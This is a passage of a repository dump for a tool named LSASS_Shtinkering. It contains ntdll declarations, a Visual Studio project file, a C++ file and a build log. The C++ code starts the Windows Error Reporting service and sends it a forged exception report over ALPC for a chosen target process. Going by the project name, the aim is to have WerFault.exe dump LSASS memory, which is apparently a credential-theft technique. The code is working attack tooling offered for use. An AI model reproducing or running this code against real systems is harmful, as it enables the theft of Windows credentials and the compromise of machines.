175 | 	SIZE_T MaxTotalSectionSize;
176 | 	ULONG DupObjectTypes;
177 | #ifdef _WIN64
178 | 	ULONG Reserved;
179 | #endif
180 | } ALPC_PORT_ATTRIBUTES, * PALPC_PORT_ATTRIBUTES;
181 | 
182 | typedef struct _ALPC_MESSAGE_ATTRIBUTES
183 | {
184 | 	ULONG AllocatedAttributes;
185 | 	ULONG ValidAttributes;
186 | } ALPC_MESSAGE_ATTRIBUTES, * PALPC_MESSAGE_ATTRIBUTES;
187 | 
188 | enum WerSvcMessageId
189 | {
190 | 	RequestReportUnhandledException = 0x20000000,
191 | 	ReplyReportUnhandledExceptionSuccess = 0x20000001,
192 | 	ReplyReportUnhandledExceptionFailure = 0x20000002,
193 | 	RequestSilentProcessExit = 0x30000000,
194 | 	ResponseSilentProcessExitSuccess = 0x30000001,
195 | 	ResponseSilentProcessExitFailure = 0x30000002
196 | };
197 | 
198 | NTSYSAPI
199 | NTSTATUS
200 | NTAPI
201 | NtOpenEvent(
202 | 	OUT PHANDLE EventHandle,
203 | 	IN ACCESS_MASK DesiredAccess,
204 | 	IN POBJECT_ATTRIBUTES ObjectAttributes
205 | );
206 | 
207 | NTSYSAPI
208 | NTSTATUS
209 | NTAPI
210 | NtWaitForSingleObject(
211 | 	IN HANDLE Handle,
212 | 	IN BOOLEAN Alertable,
213 | 	IN PLARGE_INTEGER Timeout OPTIONAL
214 | );
215 | 
216 | NTSYSAPI
217 | NTSTATUS
218 | NTAPI
219 | NtClose(
220 | 	IN  HANDLE Handle
221 | );
222 | 
223 | NTSYSAPI
224 | VOID
225 | NTAPI
226 | RtlInitUnicodeString(
227 | 	PUNICODE_STRING DestinationString,
228 | 	PCWSTR SourceString
229 | );
230 | 
231 | typedef NTSTATUS
232 | (NTAPI* NtUpdateWnfStateData_func)(
233 | 	_In_ PVOID StateName,
234 | 	_In_reads_bytes_opt_(Length) const VOID* Buffer,
235 | 	_In_opt_ ULONG Length,
236 | 	_In_opt_ PCWNF_TYPE_ID TypeId,
237 | 	_In_opt_ const VOID* ExplicitScope,
238 | 	_In_ WNF_CHANGE_STAMP MatchingChangeStamp,
239 | 	_In_ LOGICAL CheckStamp);
240 | 
241 | #include <evntcons.h>
242 | typedef ULONG(__stdcall* EtwEventWriteNoRegistration_func)(
243 | 	_In_ LPCGUID ProviderId,
244 | 	_In_ PCEVENT_DESCRIPTOR EventDescriptor,
245 | 	_In_ ULONG UserDataCount,
246 | 	_In_reads_opt_(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData
247 | 	);
248 | 
249 | typedef LONG(WINAPI* NtAlpcSendWaitReceivePort_func)(
250 | 	_In_ HANDLE 	PortHandle,
251 | 	_In_ ULONG 	Flags,
252 | 	_In_reads_bytes_opt_(SendingMessage->u1.s1.TotalLength) PPORT_MESSAGE 	SendingMessage,
253 | 	_Inout_opt_ PALPC_MESSAGE_ATTRIBUTES 	SendingMessageMessageAttributes,
254 | 	PPORT_MESSAGE 	ReceiveMessage,
255 | 	_Inout_opt_ PSIZE_T 	BufferLength,
256 | 	_Inout_opt_ PALPC_MESSAGE_ATTRIBUTES 	ReceiveMessageAttributes,
257 | 	_In_opt_ PLARGE_INTEGER 	Timeout);
258 | 
259 | typedef LONG(WINAPI* NtAlpcConnectPort_func)(
260 | 	_Out_ PHANDLE 	PortHandle,
261 | 	_In_ PUNICODE_STRING 	PortName,
262 | 	_In_opt_ POBJECT_ATTRIBUTES 	ObjectAttributes,
263 | 	_In_opt_ PALPC_PORT_ATTRIBUTES 	PortAttributes,
264 | 	_In_ ULONG 	Flags,
265 | 	_In_opt_ PSID 	RequiredServerSid,
266 | 	_Inout_ PPORT_MESSAGE 	ConnectionMessage,
267 | 	_Inout_opt_ PULONG 	BufferLength,
268 | 	_Inout_opt_ PALPC_MESSAGE_ATTRIBUTES 	OutMessageAttributes,
269 | 	_Inout_opt_ PALPC_MESSAGE_ATTRIBUTES 	InMessageAttributes,
270 | 	_In_opt_ PLARGE_INTEGER 	Timeout);
271 | 
272 | #ifdef __cplusplus
273 | } // extern "C"
274 | #endif
275 | 
276 | #endif // __NTDLL_H__


--------------------------------------------------------------------------------
/LSASS_Shtinkering/LSASS_Shtinkering.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{476fc126-239f-4d58-8389-e1c0e93c2c5e}</ProjectGuid>
 25 |     <RootNamespace>LSASSShtinkering</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |     <UseOfMfc>Static</UseOfMfc>
 48 |   </PropertyGroup>
 49 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 50 |     <ConfigurationType>Application</ConfigurationType>
 51 |     <UseDebugLibraries>false</UseDebugLibraries>
 52 |     <PlatformToolset>v142</PlatformToolset>
 53 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 54 |     <CharacterSet>Unicode</CharacterSet>
 55 |   </PropertyGroup>
 56 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 57 |   <ImportGroup Label="ExtensionSettings">
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="Shared">
 60 |   </ImportGroup>
 61 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 62 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 71 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 72 |   </ImportGroup>
 73 |   <PropertyGroup Label="UserMacros" />
 74 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 75 |     <LinkIncremental>true</LinkIncremental>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 78 |     <LinkIncremental>false</LinkIncremental>
 79 |   </PropertyGroup>
 80 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 81 |     <LinkIncremental>true</LinkIncremental>
 82 |   </PropertyGroup>
 83 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 84 |     <LinkIncremental>false</LinkIncremental>
 85 |   </PropertyGroup>
 86 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 87 |     <ClCompile>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <SDLCheck>true</SDLCheck>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |       <ConformanceMode>true</ConformanceMode>
 92 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
 93 |     </ClCompile>
 94 |     <Link>
 95 |       <SubSystem>Console</SubSystem>
 96 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 97 |       <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
 98 |     </Link>
 99 |   </ItemDefinitionGroup>
100 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
101 |     <ClCompile>
102 |       <WarningLevel>Level3</WarningLevel>
103 |       <FunctionLevelLinking>true</FunctionLevelLinking>
104 |       <IntrinsicFunctions>true</IntrinsicFunctions>
105 |       <SDLCheck>true</SDLCheck>
106 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
107 |       <ConformanceMode>true</ConformanceMode>
108 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
109 |     </ClCompile>
110 |     <Link>
111 |       <SubSystem>Console</SubSystem>
112 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
113 |       <OptimizeReferences>true</OptimizeReferences>
114 |       <GenerateDebugInformation>true</GenerateDebugInformation>
115 |       <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
116 |     </Link>
117 |   </ItemDefinitionGroup>
118 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
119 |     <ClCompile>
120 |       <WarningLevel>Level3</WarningLevel>
121 |       <SDLCheck>true</SDLCheck>
122 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
123 |       <ConformanceMode>true</ConformanceMode>
124 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
125 |     </ClCompile>
126 |     <Link>
127 |       <SubSystem>Console</SubSystem>
128 |       <GenerateDebugInformation>true</GenerateDebugInformation>
129 |       <AdditionalDependencies>Advapi32.lib;Userenv.lib;%(AdditionalDependencies)</AdditionalDependencies>
130 |     </Link>
131 |   </ItemDefinitionGroup>
132 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
133 |     <ClCompile>
134 |       <WarningLevel>Level3</WarningLevel>
135 |       <FunctionLevelLinking>true</FunctionLevelLinking>
136 |       <IntrinsicFunctions>true</IntrinsicFunctions>
137 |       <SDLCheck>true</SDLCheck>
138 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
139 |       <ConformanceMode>true</ConformanceMode>
140 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
141 |     </ClCompile>
142 |     <Link>
143 |       <SubSystem>Console</SubSystem>
144 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
145 |       <OptimizeReferences>true</OptimizeReferences>
146 |       <GenerateDebugInformation>true</GenerateDebugInformation>
147 |       <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
148 |     </Link>
149 |   </ItemDefinitionGroup>
150 |   <ItemGroup>
151 |     <ClCompile Include="Lsass_Shtinkering.cpp" />
152 |     <ClCompile Include="Utils.cpp" />
153 |     <ClCompile Include="WerReportException.cpp" />
154 |   </ItemGroup>
155 |   <ItemGroup>
156 |     <ClInclude Include="Lsass_Shtinkering.h" />
157 |     <ClInclude Include="ntddk.h" />
158 |     <ClInclude Include="Utils.h" />
159 |     <ClInclude Include="WerReportException.h" />
160 |   </ItemGroup>
161 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
162 |   <ImportGroup Label="ExtensionTargets">
163 |   </ImportGroup>
164 | </Project>


--------------------------------------------------------------------------------
/LSASS_Shtinkering/WerReportException.cpp:
--------------------------------------------------------------------------------
  1 | #include "WerReportException.h"
  2 | 
  3 | NTSTATUS SignalStartWerSvc()
  4 | {
  5 | 	NTSTATUS ntstatus = STATUS_UNSUCCESSFUL;
  6 | 	HMODULE ntdllHandle = GetModuleHandle(L"ntdll.dll");
  7 | 	const auto NtUpdateWnfStateData = reinterpret_cast<NtUpdateWnfStateData_func>(GetProcAddress(ntdllHandle, "NtUpdateWnfStateData"));
  8 | 
  9 | 	if (NtUpdateWnfStateData)
 10 | 	{
 11 | 		__int64 werWnfStateName = 0x41940B3AA3BC0875; // WNF_WER_SERVICE_START
 12 | 		wcout << L"        [-] NtUpdateWnfStateData() for WNF_WER_SERVICE_START" << endl;
 13 | 		ntstatus = NtUpdateWnfStateData(&werWnfStateName, nullptr, 0, nullptr, nullptr, 0, 0);
 14 | 	}
 15 | 	else
 16 | 	{
 17 | 		// Alternative to WNF (before Win8 for example)
 18 | 		const auto EtwEventWriteNoRegistration = reinterpret_cast<EtwEventWriteNoRegistration_func>(GetProcAddress(ntdllHandle, "EtwEventWriteNoRegistration"));
 19 | 		if (nullptr == EtwEventWriteNoRegistration)
 20 | 			return ntstatus;
 21 | 
 22 | 		constexpr GUID feedbackServiceTriggerProviderGuid = { 0xe46eead8, 0xc54, 0x4489, {0x98, 0x98, 0x8f, 0xa7, 0x9d, 0x5, 0x9e, 0xe} };
 23 | 		EVENT_DESCRIPTOR eventDescriptor;
 24 | 		RtlZeroMemory(&eventDescriptor, sizeof(EVENT_DESCRIPTOR));
 25 | 
 26 | 		wcout << L"        [-] EtwEventWriteNoRegistration() for {E46EEAD8-0C54-4489-9898-8FA79D059E0E}" << endl;
 27 | 
 28 | 		ntstatus = EtwEventWriteNoRegistration(&feedbackServiceTriggerProviderGuid, &eventDescriptor, 0, nullptr);
 29 | 	}
 30 | 
 31 | 	return ntstatus;
 32 | }
 33 | 
 34 | NTSTATUS WaitForWerSvc()
 35 | {
 36 | 	constexpr auto name = L"\\KernelObjects\\SystemErrorPortReady";
 37 | 	UNICODE_STRING objectName;
 38 | 	objectName.Buffer = const_cast<PWSTR>(name);
 39 | 	objectName.Length = 0x46;
 40 | 	objectName.MaximumLength = 0x48;
 41 | 
 42 | 	OBJECT_ATTRIBUTES objectAttributes;
 43 | 	objectAttributes.ObjectName = &objectName;
 44 | 	objectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
 45 | 	objectAttributes.RootDirectory = nullptr;
 46 | 	objectAttributes.Attributes = 0;
 47 | 	objectAttributes.SecurityDescriptor = nullptr;
 48 | 	objectAttributes.SecurityQualityOfService = nullptr;
 49 | 
 50 | 	wcout << L"        [-] NtOpenEvent() for \"\\KernelObjects\\SystemErrorPortReady\"" << endl;
 51 | 
 52 | 	HANDLE hEvent;
 53 | 	NTSTATUS ntstatus = NtOpenEvent(&hEvent, EVENT_QUERY_STATE | SYNCHRONIZE, &objectAttributes);
 54 | 	
 55 | 	if (!NT_SUCCESS(ntstatus))
 56 | 		throw runtime_error("WaitForWerSvc()->NtOpenEvent() failed");
 57 | 
 58 | 	wcout << L"        [-] NtWaitForSingleObject() for hEvent" << endl;
 59 | 
 60 | 	ntstatus = NtWaitForSingleObject(hEvent, FALSE, nullptr);
 61 | 	NtClose(hEvent);
 62 | 	return ntstatus;
 63 | }
 64 | 
 65 | NTSTATUS SendMessageToWerService(ReportExceptionWerAlpcMessage* SendingMessage, ReportExceptionWerAlpcMessage* ReceivingMessage)
 66 | {
 67 | 	wcout << L"    [-] SignalStartWerSvc()" << endl;
 68 | 	NTSTATUS ntstatus = SignalStartWerSvc();
 69 | 	wcout << L"        [-] NTSTATUS: 0x" << ntstatus << endl;
 70 | 	if (!NT_SUCCESS(ntstatus))
 71 | 		throw runtime_error("Signaling WER to start failed");
 72 | 
 73 | 	wcout << L"    [-] WaitForWerSvc()" << endl;
 74 | 	ntstatus = WaitForWerSvc();
 75 | 	wcout << L"        [-] NTSTATUS: 0x" << ntstatus << endl;
 76 | 	
 77 | 	if (!NT_SUCCESS(ntstatus))
 78 | 		throw runtime_error("Waiting for WER to start failed");
 79 | 
 80 | 	
 81 | 
 82 | 	HMODULE ntdllHandle = GetModuleHandle(L"ntdll.dll");
 83 | 	auto ZwAlpcConnectPort = reinterpret_cast<NtAlpcConnectPort_func>(GetProcAddress(ntdllHandle, "ZwAlpcConnectPort"));
 84 | 	auto NtAlpcSendWaitReceivePort = reinterpret_cast<NtAlpcSendWaitReceivePort_func>(GetProcAddress(ntdllHandle, "NtAlpcSendWaitReceivePort"));
 85 | 
 86 | 	UNICODE_STRING alpcWerPortString;
 87 | 	RtlInitUnicodeString(&alpcWerPortString, L"\\WindowsErrorReportingServicePort");
 88 | 
 89 | 	HANDLE portHandle;
 90 | 	OBJECT_ATTRIBUTES objectAttributes;
 91 | 	ALPC_PORT_ATTRIBUTES portAttributes;
 92 | 	PORT_MESSAGE connectionMessage;
 93 | 
 94 | 	objectAttributes.Length = sizeof(objectAttributes);
 95 | 	objectAttributes.RootDirectory = nullptr;
 96 | 	objectAttributes.Attributes = 0;
 97 | 	objectAttributes.ObjectName = nullptr;
 98 | 	objectAttributes.SecurityDescriptor = nullptr;
 99 | 	objectAttributes.SecurityQualityOfService = nullptr;
100 | 
101 | 	memset(&portAttributes, 0, sizeof(portAttributes));
102 | 	portAttributes.MaxMessageLength = sizeof(ReportExceptionWerAlpcMessage);
103 | 
104 | 	ntstatus = ZwAlpcConnectPort(&portHandle, &alpcWerPortString, &objectAttributes, &portAttributes, ALPC_MSGFLG_SYNC_REQUEST, nullptr, nullptr, nullptr, nullptr, nullptr, nullptr);
105 | 	wcout << L"    [-] ZwAlpcConnectPort() for \"\\WindowsErrorReportingServicePort\" NTSTATUS: 0x" << ntstatus << endl;
106 | 	if (!NT_SUCCESS(ntstatus))
107 | 		throw runtime_error("ZwAlpcConnectPort failed");
108 | 
109 | 	SIZE_T bufLength = sizeof(ReportExceptionWerAlpcMessage);
110 | 	ntstatus = NtAlpcSendWaitReceivePort(portHandle, ALPC_MSGFLG_SYNC_REQUEST, reinterpret_cast<PPORT_MESSAGE>(SendingMessage), nullptr, reinterpret_cast<PPORT_MESSAGE>(ReceivingMessage), &bufLength, nullptr, nullptr);
111 | 	NtClose(portHandle);
112 | 	std::cout << "    [-] NtAlpcSendWaitReceivePort() NTSTATUS: 0x" << std::hex << ntstatus << endl;
113 | 	std::cout << "    [-] Received message NtStatusErrorCode: 0x" << ReceivingMessage->NtStatusErrorCode << endl;
114 | 
115 | 	// Check that the ntstatus from the call and in the received message indicate success
116 | 	if (NT_SUCCESS(ntstatus) && STATUS_TIMEOUT != ntstatus)
117 | 	{
118 | 		if (!NT_SUCCESS(ReceivingMessage->NtStatusErrorCode))
119 | 			throw runtime_error("ReceivingMessage->NtStatusErrorCode indicates a fail");
120 | 	}
121 | 	else
122 | 		throw runtime_error("NtAlpcSendWaitReceivePort failed");
123 | 
124 | 	return ntstatus;
125 | }
126 | 
127 | BOOL ReportExceptionToWer(DWORD ProcessPid, HANDLE ProcessHandle)
128 | {
129 | 	// Create exception details
130 | 	EXCEPTION_RECORD exceptionRecord = {};
131 | 	_EXCEPTION_POINTERS exceptionPointers = {};
132 | 	CONTEXT context = {};
133 | 	exceptionRecord.ExceptionCode = STATUS_UNSUCCESSFUL;
134 | 	exceptionPointers.ExceptionRecord = &exceptionRecord;
135 | 	exceptionPointers.ContextRecord = &context;
136 | 
137 | 	// Create hRecoveryEVent & hCompletionEvent
138 | 	_SECURITY_ATTRIBUTES eventAttributes = { sizeof(_SECURITY_ATTRIBUTES) , nullptr, TRUE };
139 | 
140 | 	HANDLE hRecoveryEvent = CreateEventW(&eventAttributes, TRUE, 0, nullptr);
141 | 	HANDLE hCompletionEvent = CreateEventW(&eventAttributes, TRUE, 0, nullptr);
142 | 
143 | 	// Create the file mapping
144 | 	const HANDLE hFileMapping = CreateFileMappingW(GetCurrentProcess(), &eventAttributes, PAGE_READWRITE, 0, sizeof(MappedViewStruct), nullptr);
145 | 	HANDLE mappedView = MapViewOfFile(hFileMapping, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
146 | 
147 | 	// Prepare the MappedViewStruct
148 | 	MappedViewStruct mps = {};
149 | 	mps.Size = sizeof(MappedViewStruct);
150 | 	mps.ExceptionPointers = &exceptionPointers;
151 | 	mps.hCompletionEvent = hCompletionEvent;
152 | 	mps.hRecoveryEvent = hRecoveryEvent;
153 | 	mps.NtErrorCode = E_FAIL;
154 | 	mps.NtStatusErrorCode = STATUS_UNSUCCESSFUL;
155 | 	mps.TickCount = GetTickCount();
156 | 	mps.TargetProcessPid = ProcessPid;
157 | 	mps.hTargetProcess = ProcessHandle;
158 | 	mps.TargetThreadTid = GetFirstThread(ProcessPid);
159 | 	mps.hTargetThread = OpenThread(THREAD_QUERY_LIMITED_INFORMATION, TRUE, mps.TargetThreadTid);
160 | 
161 | 	// Print MappedViewStruct members
162 | 	wcout << L"[*] MappedViewStruct:" << endl;
163 | 	wcout << L"    [-] Size: 0x"              << mps.Size              << endl;
164 | 	wcout << L"    [-] ExceptionPointers: 0x" << mps.ExceptionPointers << endl;
165 | 	wcout << L"    [-] hCompletionEvent: 0x"  << mps.hCompletionEvent  << endl;
166 | 	wcout << L"    [-] hRecoveryEvent: 0x"    << mps.hRecoveryEvent    << endl;
167 | 	wcout << L"    [-] NtErrorCode: 0x"       << mps.NtErrorCode       << endl;
168 | 	wcout << L"    [-] NtStatusErrorCode: 0x" << mps.NtStatusErrorCode << endl;
169 | 	wcout << L"    [-] TickCount: 0x"         << mps.TickCount         << endl;
170 | 	wcout << L"    [-] TargetProcessPID: 0x"  << mps.TargetProcessPid  << endl;
171 | 	wcout << L"    [-] hTargetProcess: 0x"    << mps.hTargetProcess    << endl;
172 | 	wcout << L"    [-] TargetThreadTID: 0x"   << mps.TargetThreadTid   << endl;
173 | 	wcout << L"    [-] hTargetThread: 0x"     << mps.hTargetThread     << endl;
174 | 
175 | 	// Prepare the ALPC request
176 | 	ReportExceptionWerAlpcMessage sendingMessage = {};
177 | 	sendingMessage.PortMessage.u1.s1.TotalLength = sizeof(ReportExceptionWerAlpcMessage);
178 | 	sendingMessage.PortMessage.u1.s1.DataLength = sizeof(ReportExceptionWerAlpcMessage) - sizeof(PORT_MESSAGE);
179 | 	sendingMessage.MessageType = WerSvcMessageId::RequestReportUnhandledException;
180 | 	sendingMessage.Flags = 0;
181 | 	sendingMessage.hFileMapping = hFileMapping;
182 | 	sendingMessage.hCompletionEvent = hCompletionEvent;
183 | 	sendingMessage.hRecoveryEvent = hRecoveryEvent;
184 | 	sendingMessage.hFileMapping2 = hFileMapping;
185 | 	sendingMessage.hTargetProcess = mps.hTargetProcess;
186 | 	sendingMessage.hTargetThread = mps.hTargetThread;
187 | 	sendingMessage.TargetProcessId = mps.TargetProcessPid;
188 | 
189 | 	// Prepare the ALPC response
190 | 	ReportExceptionWerAlpcMessage receivingMessage = {};
191 | 	receivingMessage.PortMessage.u1.s1.TotalLength = sizeof(ReportExceptionWerAlpcMessage);
192 | 	receivingMessage.PortMessage.u1.s1.DataLength = sizeof(ReportExceptionWerAlpcMessage) - sizeof(PORT_MESSAGE);
193 | 
194 | 	// Copy the struct into the mapped view
195 | 	RtlCopyMemory(mappedView, &mps, sizeof(mps));
196 | 
197 | 	wcout << L"[*] SendMessageToWerService()" << endl;
198 | 
199 | 	// Send the request and get the response from the ALPC server
200 | 	NTSTATUS werNtstatus = SendMessageToWerService(&sendingMessage, &receivingMessage);
201 | 
202 | 	CloseHandle(mappedView);
203 | 	CloseHandle(hFileMapping);
204 | 	CloseHandle(hCompletionEvent);
205 | 	CloseHandle(hRecoveryEvent);
206 | 
207 | 	// Did we fail to send the ALPC message?
208 | 	if (STATUS_SUCCESS != werNtstatus)
209 | 		throw runtime_error("SendMessageToWERService failed");
210 | 
211 | 	// Did the operation not succeed on WerSvc side?
212 | 	if (STATUS_SUCCESS != receivingMessage.NtStatusErrorCode)
213 | 	{
214 | 		std::stringstream messageStream;
215 | 		messageStream << "receivingMessage.NtStatusErrorCode is 0x";
216 | 		messageStream << std::hex << to_string(receivingMessage.NtStatusErrorCode);
217 | 		string errorMessage = messageStream.str();
218 | 		throw runtime_error(errorMessage.c_str());
219 | 	}
220 | 
221 | 	// Check if message type indicates failure
222 | 	if (WerSvcMessageId::ReplyReportUnhandledExceptionFailure != receivingMessage.MessageType)
223 | 	{
224 | 		std::stringstream messageStream;
225 | 		messageStream << "receivingMessage.MessageType is 0x";
226 | 		messageStream << std::hex << to_string(receivingMessage.NtStatusErrorCode);
227 | 		string errorMessage = messageStream.str();
228 | 		throw runtime_error(errorMessage.c_str());
229 | 		
230 | 	}
231 | 
232 | 	// The reply consists of a handle to the spawned WerFault.exe process
233 | 	auto werFaultProcessHandle = reinterpret_cast<HANDLE>(receivingMessage.Flags);
234 | 
235 | 	wcout << L"[*] Waiting for WerFault.exe to exit..." << endl;
236 | 
237 | 	// Wait for WeFault to exit
238 | 	while (TRUE)
239 | 	{
240 | 		NTSTATUS ntstatus = NtWaitForSingleObject(werFaultProcessHandle, TRUE, nullptr);
241 | 
242 | 		// Was there was either a timeout or a failure
243 | 		if (STATUS_TIMEOUT == ntstatus || ntstatus < 0)
244 | 			break;
245 | 
246 | 		// If there wasn't a failure,
247 | 		// did we return because of an APC or because the wait was aborted?
248 | 		if (STATUS_USER_APC != ntstatus && STATUS_ALERTED != ntstatus)
249 | 		{
250 | 			ntstatus = STATUS_SUCCESS;
251 | 			break;
252 | 		}
253 | 
254 | 	}
255 | 	return TRUE;
256 | }


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/LSASS_Shtinkering.log:
--------------------------------------------------------------------------------
  1 |   Lsass_Shtinkering.cpp
  2 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(66,1): warning C4005: “STATUS_WAIT_0”: 宏重定义
  3 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2496): message : 参见“STATUS_WAIT_0”的前一个定义
  4 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(221,1): warning C4005: “STATUS_ABANDONED_WAIT_0”: 宏重定义
  5 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2497): message : 参见“STATUS_ABANDONED_WAIT_0”的前一个定义
  6 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(244,1): warning C4005: “STATUS_USER_APC”: 宏重定义
  7 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2498): message : 参见“STATUS_USER_APC”的前一个定义
  8 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(280,1): warning C4005: “STATUS_TIMEOUT”: 宏重定义
  9 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2499): message : 参见“STATUS_TIMEOUT”的前一个定义
 10 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(289,1): warning C4005: “STATUS_PENDING”: 宏重定义
 11 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2500): message : 参见“STATUS_PENDING”的前一个定义
 12 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(736,1): warning C4005: “DBG_EXCEPTION_HANDLED”: 宏重定义
 13 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2501): message : 参见“DBG_EXCEPTION_HANDLED”的前一个定义
 14 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(745,1): warning C4005: “DBG_CONTINUE”: 宏重定义
 15 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2502): message : 参见“DBG_CONTINUE”的前一个定义
 16 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(820,1): warning C4005: “STATUS_SEGMENT_NOTIFICATION”: 宏重定义
